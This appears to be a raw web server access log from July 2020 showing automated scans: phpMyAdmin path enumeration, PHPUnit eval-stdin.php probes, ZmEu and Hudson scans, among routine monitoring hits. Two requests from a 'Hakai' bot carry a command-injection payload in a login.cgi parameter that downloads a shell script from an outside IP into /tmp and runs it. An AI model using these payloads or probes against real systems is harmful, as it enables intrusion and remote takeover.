218.76.223.50 - - [05/Jul/2020:09:55:33 +0200] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:33 +0200] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:33 +0200] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:54 +0200] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:54 +0200] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:54 +0200] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:55 +0200] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:57 +0200] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:57 +0200] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:58 +0200] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:55:59 +0200] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:00 +0200] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
195.54.160.135 - - [05/Jul/2020:09:56:02 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:09:56:06 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
218.76.223.50 - - [05/Jul/2020:09:56:08 +0200] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:08 +0200] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:18 +0200] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:18 +0200] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:18 +0200] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:19 +0200] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:20 +0200] "GET /s/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:21 +0200] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:21 +0200] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:22 +0200] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
212.91.246.72 - - [05/Jul/2020:09:56:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.76.223.50 - - [05/Jul/2020:09:56:29 +0200] "GET /pwd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:30 +0200] "GET /phpMyAdmina/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:30 +0200] "GET /phpMydmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:31 +0200] "GET /phpMyAdmins/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:31 +0200] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:31 +0200] "GET /phpMyAdmin._2/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:31 +0200] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:32 +0200] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:33 +0200] "GET /phpmyadmin3333/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:34 +0200] "GET /php2MyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:34 +0200] "GET /phpiMyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:37 +0200] "GET /phpNyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:38 +0200] "GET /1/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:38 +0200] "GET /download/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:45 +0200] "GET /phpMyAdmin_111/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:53 +0200] "GET /phpmadmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:56:54 +0200] "GET /321/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:01 +0200] "GET /123131/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
114.32.133.72 - - [05/Jul/2020:09:57:05 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
218.76.223.50 - - [05/Jul/2020:09:57:09 +0200] "GET /phpMyAdminn/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
212.91.246.72 - - [05/Jul/2020:09:57:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
218.76.223.50 - - [05/Jul/2020:09:57:33 +0200] "GET /sbb/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:33 +0200] "GET /WWW/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:33 +0200] "GET /phpMyAdmln/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:34 +0200] "GET /phpMyAdmin_ai/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:34 +0200] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:35 +0200] "GET /program/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:35 +0200] "GET /shopdb/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:35 +0200] "GET /phppma/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:36 +0200] "GET /phpmy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:40 +0200] "GET /mysql/admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:45 +0200] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:55 +0200] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:55 +0200] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:55 +0200] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:56 +0200] "GET /sqladmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:56 +0200] "GET /sql/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:56 +0200] "GET /SQL/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:57 +0200] "GET /websql/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:58 +0200] "GET /MySQLAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:31.0) Gecko/20100101 Firefox/31.0"
218.76.223.50 - - [05/Jul/2020:09:57:59 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"
218.76.223.50 - - [05/Jul/2020:09:57:59 +0200] "POST /axis2/axis2-admin/login HTTP/1.1" 404 328 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
212.91.246.72 - - [05/Jul/2020:09:58:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:59:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.232.183.139 - - [05/Jul/2020:09:59:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [05/Jul/2020:10:00:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:10:00:28 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:10:01:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:02:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:03:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:10:04:00 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.93.11.200 - - [05/Jul/2020:10:04:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
216.244.66.231 - - [05/Jul/2020:10:04:12 +0200] "GET /robots.txt HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
212.91.246.72 - - [05/Jul/2020:10:04:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:05:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.244.66.231 - - [05/Jul/2020:10:05:59 +0200] "GET /seiten/kontroll.htm HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
114.32.226.14 - - [05/Jul/2020:10:06:18 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:10:06:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:07:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.14.156.128 - - [05/Jul/2020:10:07:43 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Jul/2020:10:08:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:09:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:10:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:11:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:12:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:13:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:14:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:15:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.221.122 - - [05/Jul/2020:10:16:01 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/Jul/2020:10:16:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:17:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.221.122 - - [05/Jul/2020:10:17:45 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.122 - - [05/Jul/2020:10:17:48 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.122 - - [05/Jul/2020:10:18:09 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/Jul/2020:10:18:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:19:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
192.241.221.122 - - [05/Jul/2020:10:20:06 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
220.133.155.39 - - [05/Jul/2020:10:20:18 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:10:20:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:21:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.232.183.139 - - [05/Jul/2020:10:21:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
103.74.109.125 - - [05/Jul/2020:10:21:56 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
192.241.221.122 - - [05/Jul/2020:10:21:58 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
192.241.221.122 - - [05/Jul/2020:10:22:18 +0200] "GET /hudson HTTP/1.1" 404 311 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/Jul/2020:10:22:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:23:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.163.169.157 - - [05/Jul/2020:10:24:05 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Jul/2020:10:24:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:25:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:26:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:27:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
168.205.38.230 - - [05/Jul/2020:10:27:59 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:10:28:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:29:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:30:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.235.254.103 - - [05/Jul/2020:10:31:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:10:31:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:32:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:33:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:34:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:35:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:36:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.88.123.248 - - [05/Jul/2020:10:36:42 +0200] "GET /phpmyadmin/ HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:10:37:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:38:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.216.42 - - [05/Jul/2020:10:38:25 +0200] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 346 "-" "ZmEu"
142.93.216.42 - - [05/Jul/2020:10:38:25 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
142.93.216.42 - - [05/Jul/2020:10:38:25 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "ZmEu"
122.100.104.5 - - [05/Jul/2020:10:38:25 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
142.93.216.42 - - [05/Jul/2020:10:38:25 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "ZmEu"
142.93.216.42 - - [05/Jul/2020:10:38:26 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
142.93.216.42 - - [05/Jul/2020:10:38:26 +0200] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "ZmEu"
212.91.246.72 - - [05/Jul/2020:10:39:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:40:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:41:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:42:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:43:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:44:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:10:45:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.162.106.181 - - [05/Jul/2020:10:45:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "HTTP Banner Detection (https://security.ipip.net)"
